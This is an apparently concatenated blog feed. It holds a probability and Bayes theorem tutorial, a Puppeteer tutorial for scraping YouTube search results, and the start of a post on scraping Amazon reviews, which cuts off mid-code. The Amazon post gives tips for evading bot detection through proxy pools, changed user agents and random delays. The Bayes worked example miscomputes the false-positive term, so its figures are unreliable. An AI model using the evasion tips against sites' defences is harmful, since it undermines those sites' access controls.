<p>The <strong>mean</strong> or <strong>expected value</strong> of a random variable for example of throwing a dice is <span class="math">\((1+2+3+4+5+6)/6=3.5\)</span>.</p>
<p>Then there are measurements of deviance for random variables. The <strong>variance</strong> of a random variable is the mean of the squared difference from realisation of the random variable and the mean of the random variable. Therefore the variance of the dice example from above is
</p>
<div class="math">$$
Var(X) = ((1-3.5)^2 + (2-3.5)^2 + (3-3.5)^2 + (4-3.5)^2 + (5-3.5)^2 + (6-3.5)^2)/6 \approx 2.9
$$</div>
<p>This statistical function gives us a quantity of how much the random variable varies around the mean of the distribution. The <strong>standard deviation</strong> is the square root of the variance.</p>
<p>When we look at two random variables <span class="math">\(X\)</span> and <span class="math">\(Y\)</span> we can speak of dependent and independent random variables. Two random variables are independent when
</p>
<div class="math">$$P(X=x, Y=y)=P(x)P(y)$$</div>
<p>
if this is not the case they are said to be dependent. Height and weight are usually dependent random variables. Gender and height are also dependent random variables. Hair color and height are however independent from each other.</p>
<p>We speak of independent and identical distributed random variables when a series of random variables <span class="math">\((X_n)_{n \in \mathbb{N}}\)</span> are all independent to each other and they all have the same probability distribution.</p>
<p>When we know that two random variables are dependent on each other, we are interested in the <strong>conditional probability</strong>. For example what is the conditional probability that a person has a height of 188cm when we know that this person weighs 70kg <span class="math">\(P(Height=1.88m, Weight=70kg)\)</span>? This conditional probability is most likely lower than the conditional probability <span class="math">\(P(Height=1.88m, Weight=80kg)\)</span>.</p>
<p>Conditional probability can be formally written as <span class="math">\(P(x|y) = \frac{p(x,y)}{p(y)}\)</span></p>
<h2>Bayes Theorem</h2>
<p>Let <span class="math">\(X\)</span> and <span class="math">\(Y\)</span> be random variables. Then the following equation is known as Bayes Theorem:</p>
<div class="math">$$
p(y|x)=\frac{p(x|y)p(y)}{p(x)}
$$</div>
<p>this follows from the following equality:</p>
<div class="math">$$
p(x,y) = p(x|y)p(y) = p(y|x)p(x)
$$</div>
<h4>Example for Bayes Theorem</h4>
<p>Because <strong>Bayes theorem</strong> is of such importance, it makes sense to introduce an example in order to get
an inuitive understanding of the theorem. </p>
<p>Let's suppose we have a medical test that enables us to test whether a patient has yellow fewer.
When a patient is infected with yellow fewer, the test yields always a postive result.
On the other hand, the test has for healthy patients a error rate of 2%. Let X be the random variable that tracks the health status of the patient and let T be the random variable that shows the test result of the test. So far we know that <span class="math">\(P(T=\text{positive}|X=\text{healthy})=0.02\)</span> and <span class="math">\(P(T=\text{negative}|X=\text{healthy})=0.98\)</span>.</p>
<p>Let's assume that <span class="math">\(0.05%\)</span> of the whole population is infected with yellow fewer in a country like Colombia. We are interested in the probability that the patient is infected with yellow fewer under the condition that the test is positive. Formally we are looking for the solution of
</p>
<div class="math">$$
p(X=\text{infected}|T=\text{positive}) = \frac{p(T=\text{positive}|X=\text{infected})p(X=\text{infected})}{p(T=\text{positive})}
$$</div>
<p>The only term in the equation we don't know is <span class="math">\(p(T=\text{positive})\)</span>. We can compute it by summing over all possible cases:
</p>
<div class="math">$$
p(T=\text{positive}) = p(T=\text{positive}, X=\text{infected}) + p(T=\text{positive}, X=\text{healthy}) =\\ p(T=\text{positive}|X=\text{infected})p(X=\text{infected}) + p(T=\text{positive}|X=\text{healthy})p(X=\text{healthy}) =\\ 1.0\cdot0.0005 + 0.002 \cdot 0.9995 =\\ 0.0025
$$</div>
<p>We can now compute the probablity as <span class="math">\(p(X=\text{infected}|T=\text{positive})= \frac{1.0 \cdot 0.0005}{0.0025} = 0.2\)</span>. </p>
<p>This result is quite astonishing. Even though the test has only a 2% error rate, the test has only a probability of <strong>20%</strong> to be corret in confirming an infection if the patient is infected.</p>
<p>So how can we improve the diagnosis and make the test better?</p>
<p>We could introduce more information into account, such as the age or gender of the person to be tested.
For example if we fix the age at 22 years, then <span class="math">\(p(X=\text{infected}|Age=\text{22}) = 0.001%\)</span> is much lower than the probability that a person of any age is infected (0.05%).</p>
<p>This combination of evidence is a <strong>very powerful approach</strong>.</p>
<p>We could also repeat measurements with two independent tests <span class="math">\(T_1\)</span> and <span class="math">\(T_2\)</span> and then the conditional probability from above will be much higher then before:</p>
<div class="math">$$
p(X=\text{infected}|T_1=\text{positive},T_2=\text{positive})
$$</div>
<h2>Basic Algorithms</h2>
<p>A very good overview of basic machine learning algorithms classified by problem domain can be <a href="https://machinelearningmastery.com/a-tour-of-machine-learning-algorithms/">found here</a>.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Tutorial: Youtube scraping with puppeteer2018-10-29T13:58:00+01:002018-10-29T13:58:00+01:00Nikolai Tschachertag:incolumitas.com,2018-10-29:/2018/10/29/youtube-puppeteer-scraping/<p>How to scrape youtube videos using puppeteer</p><p>In this blog post I am going to show you how to scrape YouTube video data using the handy puppeteer library. Puppeteer is a Node library
which uses the DevTools Protocol in order to control chrome browsers (Or any other browser that implements the DevTools Protocol). </p>
<h3>Quickstart</h3>
<p>If you are short in time, just download the library from the <a href="https://github.com/NikolaiT/youtube-scraping">github repository</a> and follow the instructions there.</p>
<h3>You are not a programmer?</h3>
<p>If you are not a programmer, you can still scrape data from youtube (any many other search engines).
I created a service called <a href="https://scrapeulous.com/">Scrapeulous.com</a> where you can submit keyword files that are then scraped for you.</p>
<h3>Why would you want to scrape YouTube videos?</h3>
<p>If you are a <strong>content creator</strong>, you might be interested in your competitors and want to know what kind of videos they are publishing.
And maybe there are 500 video creators in your niche and you cannot monitor all their content by yourself. Therefore, you want to automate
this task. You scrape all new videos from all your competitors and then you look for certain keywords in the title and video description.</p>
<p>With this information you can determine if your competitors are</p>
<ul>
<li>stealing content from you</li>
<li>having success with a certain keyword</li>
<li>use better marketing strategies than you</li>
</ul>
<p>If you are a <strong>scientist</strong>, you might be interested in the spreading of fake news for example. You want to monitor the sources of fake news. After some
hard work you compiled a list of fake news channels and your next step is to monitor this content periodically. To do so, you are interested
in scraping every new published video. Then you can determine from where the news originated.</p>
<p>If you have a list of your <strong>favourite music videos</strong>, you need the youtube urls in order to download the videos. Using the youtube API is not always a pleasure, since
it is a little complex. Therefore this tools helps you to quickly search the links that you need.</p>
<p>There are many other scenarios that motivate collecting information from YouTube...You just need to be creative enough!</p>
<h3>What tools do you need?</h3>
<p>We are going to develop the YouTube Scraper in NodeJS. My version is:</p>
<div class="highlight"><pre><span></span><code>$ node -v
v10.12.0
</code></pre></div>
<p>Lets make a project folder.</p>
<div class="highlight"><pre><span></span><code>mkdir youtube-scraping && cd youtube-scraping
</code></pre></div>
<p>Init a new node project with:</p>
<div class="highlight"><pre><span></span><code>npm init
</code></pre></div>
<p>Then we are ready to go. First of all we need to install some third party libraries in order for our code to work.</p>
<p>Install puppeteer:</p>
<div class="highlight"><pre><span></span><code>npm i puppeteer
</code></pre></div>
<p>Install cheerio:</p>
<div class="highlight"><pre><span></span><code>npm i cheerio
</code></pre></div>
<p>Now our directory should look similar to this:</p>
<div class="highlight"><pre><span></span><code>drwxr-xr-x 57 nikolai nikolai 4096 Okt 29 14:20 node_modules/
-rw-r--r-- 1 nikolai nikolai 685 Okt 29 14:20 package.json
-rw-r--r-- 1 nikolai nikolai 16500 Okt 29 14:20 package-lock.json
</code></pre></div>
<h3>Our scraping program</h3>
<p>We are going to create two files: <code>youtube.js</code> which is the library that enables us to scrape
youtube. We will not go through every line since the code should be more or less
self explanatory. Here is the code of <code>youtube.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">cheerio</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cheerio'</span><span class="p">);</span>
<span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">scrape_youtube</span><span class="o">:</span> <span class="nx">scrape_youtube</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">const</span> <span class="nx">all_videos</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">sleep</span> <span class="o">=</span> <span class="nx">seconds</span> <span class="p">=></span>
<span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="nx">resolve</span> <span class="p">=></span> <span class="nx">setTimeout</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="p">(</span><span class="nx">seconds</span> <span class="o">||</span> <span class="mf">1</span><span class="p">)</span> <span class="o">*</span> <span class="mf">1000</span><span class="p">));</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setViewport</span><span class="p">({</span> <span class="nx">width</span><span class="o">:</span> <span class="mf">1280</span><span class="p">,</span> <span class="nx">height</span><span class="o">:</span> <span class="mf">800</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://www.youtube.com'</span><span class="p">);</span>
<span class="k">try</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'input[id="search"]'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">results</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">{};</span>
<span class="c1">// before we do anything, parse the results of the front page of youtube</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'ytd-video-renderer,ytd-grid-video-renderer'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">10000</span> <span class="p">});</span>
<span class="kd">let</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="nx">results</span><span class="p">[</span><span class="s1">'__frontpage__'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">keywords</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">keyword</span> <span class="o">=</span> <span class="nx">keywords</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$</span><span class="p">(</span><span class="s1">'input[id="search"]'</span><span class="p">);</span>
<span class="c1">// overwrites last text in input</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">click</span><span class="p">({</span> <span class="nx">clickCount</span><span class="o">:</span> <span class="mf">3</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">type</span><span class="p">(</span><span class="nx">keyword</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">input</span><span class="p">.</span><span class="nx">focus</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">keyboard</span><span class="p">.</span><span class="nx">press</span><span class="p">(</span><span class="s2">"Enter"</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForFunction</span><span class="p">(</span><span class="sb">`document.title.indexOf('</span><span class="si">${</span><span class="nx">keyword</span><span class="si">}</span><span class="sb">') !== -1`</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitForSelector</span><span class="p">(</span><span class="s1">'ytd-video-renderer,ytd-grid-video-renderer'</span><span class="p">,</span> <span class="p">{</span> <span class="nx">timeout</span><span class="o">:</span> <span class="mf">5000</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">sleep</span><span class="p">(</span><span class="mf">1</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="nx">results</span><span class="p">[</span><span class="nx">keyword</span><span class="p">]</span> <span class="o">=</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="sb">`Problem with scraping </span><span class="si">${</span><span class="nx">keyword</span><span class="si">}</span><span class="sb">: </span><span class="si">${</span><span class="nx">e</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">results</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">parse</span><span class="p">(</span><span class="nx">html</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// load the page source into cheerio</span>
<span class="kd">const</span> <span class="nx">$</span> <span class="o">=</span> <span class="nx">cheerio</span><span class="p">.</span><span class="nx">load</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span>
<span class="c1">// perform queries</span>
<span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'#contents ytd-video-renderer,#contents ytd-grid-video-renderer'</span><span class="p">).</span><span class="nx">each</span><span class="p">((</span><span class="nx">i</span><span class="p">,</span> <span class="nx">link</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span>
<span class="nx">link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#video-title'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">title</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#video-title'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">snippet</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#description-text'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">channel</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#byline a'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">channel_link</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#byline a'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'href'</span><span class="p">),</span>
<span class="nx">num_views</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#metadata-line span:nth-child(1)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="nx">release_date</span><span class="o">:</span> <span class="nx">$</span><span class="p">(</span><span class="nx">link</span><span class="p">).</span><span class="nx">find</span><span class="p">(</span><span class="s1">'#metadata-line span:nth-child(2)'</span><span class="p">).</span><span class="nx">text</span><span class="p">(),</span>
<span class="p">})</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">cleaned</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">results</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">res</span> <span class="o">=</span> <span class="nx">results</span><span class="p">[</span><span class="nx">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">link</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">link</span><span class="p">.</span><span class="nx">trim</span><span class="p">()</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span> <span class="o">&&</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">.</span><span class="nx">trim</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">.</span><span class="nx">trim</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">snippet</span> <span class="o">=</span> <span class="nx">res</span><span class="p">.</span><span class="nx">snippet</span><span class="p">.</span><span class="nx">trim</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">rank</span> <span class="o">=</span> <span class="nx">i</span><span class="o">+</span><span class="mf">1</span><span class="p">;</span>
<span class="c1">// check if this result has been used before</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">all_videos</span><span class="p">.</span><span class="nx">has</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">)</span> <span class="o">===</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">cleaned</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">res</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">all_videos</span><span class="p">.</span><span class="nx">add</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">title</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">time</span><span class="o">:</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">toUTCString</span><span class="p">(),</span>
<span class="nx">results</span><span class="o">:</span> <span class="nx">cleaned</span><span class="p">,</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<h3>Using the library</h3>
<p>Now it is time to call the library and scrape some keywords and find all the videos for those
keywords.</p>
<p>Create a file <code>index.js</code> and paste the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">youtube</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./youtube'</span><span class="p">);</span>
<span class="k">try</span> <span class="p">{</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'stupid prank'</span><span class="p">,</span>
<span class="s1">'scraping youtube'</span><span class="p">,</span>
<span class="s1">'climbing lothse'</span><span class="p">,</span>
<span class="s1">'incolumitas.com'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">youtube</span><span class="p">.</span><span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">results</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})()</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div>
<p>You can enter whatever keywords you want in the <code>keyword</code> array.</p>
<p>Start the scraping with the following command:</p>
<div class="highlight"><pre><span></span><code>node index.js
</code></pre></div>
<p>this yields me the <a href="/data/youtube-scraping.json">following results in JSON format</a>.</p>
<h3>The Scraper Source Code</h3>
<p>The scraper can be found <a href="https://github.com/NikolaiT/youtube-scraping">on this github repository</a>.</p>
<p>In order to run the scraper, you need to first clone the repository.</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/youtube-scraping
</code></pre></div>
<p>Then install dependencies:</p>
<div class="highlight"><pre><span></span><code>npm install
</code></pre></div>
<p>Create a source file in the directory you downloaded the package and
add the following code.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">youtube</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./youtube'</span><span class="p">);</span>
<span class="k">try</span> <span class="p">{</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">keywords</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'scrapeulous.com'</span><span class="p">,</span>
<span class="s1">'scraping youtube'</span><span class="p">,</span>
<span class="s1">'stupid prank'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">youtube</span><span class="p">.</span><span class="nx">scrape_youtube</span><span class="p">(</span><span class="nx">browser</span><span class="p">,</span> <span class="nx">keywords</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">results</span><span class="p">,</span> <span class="p">{</span><span class="nx">depth</span><span class="o">:</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">colors</span><span class="o">:</span> <span class="kc">true</span><span class="p">});</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})()</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div>Scraping Amazon Reviews using Headless Chrome Browser and Python32018-10-03T17:02:00+02:002018-10-03T17:02:00+02:00Nikolai Tschachertag:incolumitas.com,2018-10-03:/2018/10/03/scraping-amazon-reviews/<p>Tutorial that teaches how scrape amazon reviews</p><p>In this tutorial we are going to learn how to scrape Amazon Reviews using Python and a headless chrome browser.</p>
<h3>Why scraping amazon reviews?</h3>
<p>There are many reasons why it is interesting to scrape reviews of a amazon product?</p>
<p>For example you want to know if somebody spams fake reviews and you want to conduct a content analysis. In order to achieve this, you
are going to need the reviews as text data to launch your analysis.</p>
<p>Another reason is to find out what kind of reviews people are upvoting the most and then copy the style, structure and approach of this reviews
on your own products. The scraper also collects the number of upvotes for each review.</p>
<p>There are indefinitely more reasons why scraping review data might be a interesting idea. A lot of them have to do with business intelligence and
marketing analysis.</p>
<h3>Scraping reviews with headless browsers</h3>
<p>Of course one could scrape reviews by using low level http clients like <strong>curl</strong> or the <strong>requests</strong> library, but this makes it much easier
for Amazon to detect scraping efforts. Therefore the best solution is to mimic real users by using real browsers.</p>
<p>This led us to the choice of using headless chrome and the chromedriver for the automatic testing framework selenium.</p>
<p>With this stack (headless chrome, selenium, python) we will build our scraper.</p>
<h3>How to prevent being banned by Amazon?</h3>
<p>There are several methods how a service provider like Amazon detects scraping bots.</p>
<ol>
<li>Requests originate from limited pool of IP addresses.</li>
<li>The browser profile is always the same or similar.</li>
<li>The requests follow a similar pattern time wise.</li>
</ol>
<p>Those three detection ways are the obvious patterns. There are many more ways to detect scraping bots, but
Amazon has a hard way of banning them, because filtering them out creates too much false positives.</p>
<p>So how can you prevent being banned:</p>
<ol>
<li>Use a large pool of distinct IP addresses. Proxies, changing IP services, the Cloud</li>
<li>Change the user agent and identifying plugins/libraries from your browser</li>
<li>Insert random sleeps before scraping new reviews</li>
</ol>
<p>I know from experience that <strong>it is hard</strong> to achieve those three points, <strong>especially point 1</strong>.</p>
<p>Therefore if you have a large scraping project <strong>you can always hire me to launch such a scraping project for you</strong>.
Head to the contact section of this blog and write me a email and we can discuss your projects goals.</p>
<h3>The Scraper Source Code</h3>
<p>The scraper can be found <a href="https://github.com/NikolaiT/scraping-amazon-reviews">on this github repository</a>.</p>
<p>In order to run the scraper, you need to first clone the repository.</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/scraping-amazon-reviews
</code></pre></div>
<p>Then you need to download the headless chrome browser and the chrome driver. You can do so with this command.</p>
<div class="highlight"><pre><span></span><code>./setup.sh
</code></pre></div>
<p>Now you can scrape amazon reviews by editing the file <code>scraper.py</code> and add some amazon product urls you want to have the reviews from:</p>
<div class="highlight"><pre><span></span><code><span class="k">if</span> <span class="nv">__name__</span> <span class="o">==</span> <span class="s1">'</span><span class="s">__main__</span><span class="s1">'</span>:
<span class="nv">config</span> <span class="o">=</span> {
<span class="s2">"</span><span class="s">urls</span><span class="s2">"</span>: [
<span class="s2">"</span><span class="s">https://www.amazon.de/Crocs-Crocband-Unisex-Erwachsene-Charcoal-Ocean/dp/B007B9MI8K/ref=sr_1_1?s=shoes&ie=UTF8&qid=1537363983&sr=1-1</span><span class="s2">"</span>,
<span class="s2">"</span><span class="s">https://www.amazon.de/Samsung-UE55MU6179U-Fernseher-Triple-Schwarz/dp/B06XGS3Q4Y/ref=sr_1_4?s=home-theater&ie=UTF8&qid=1538584798&sr=1-4&keywords=tv</span><span class="s2">"</span>,
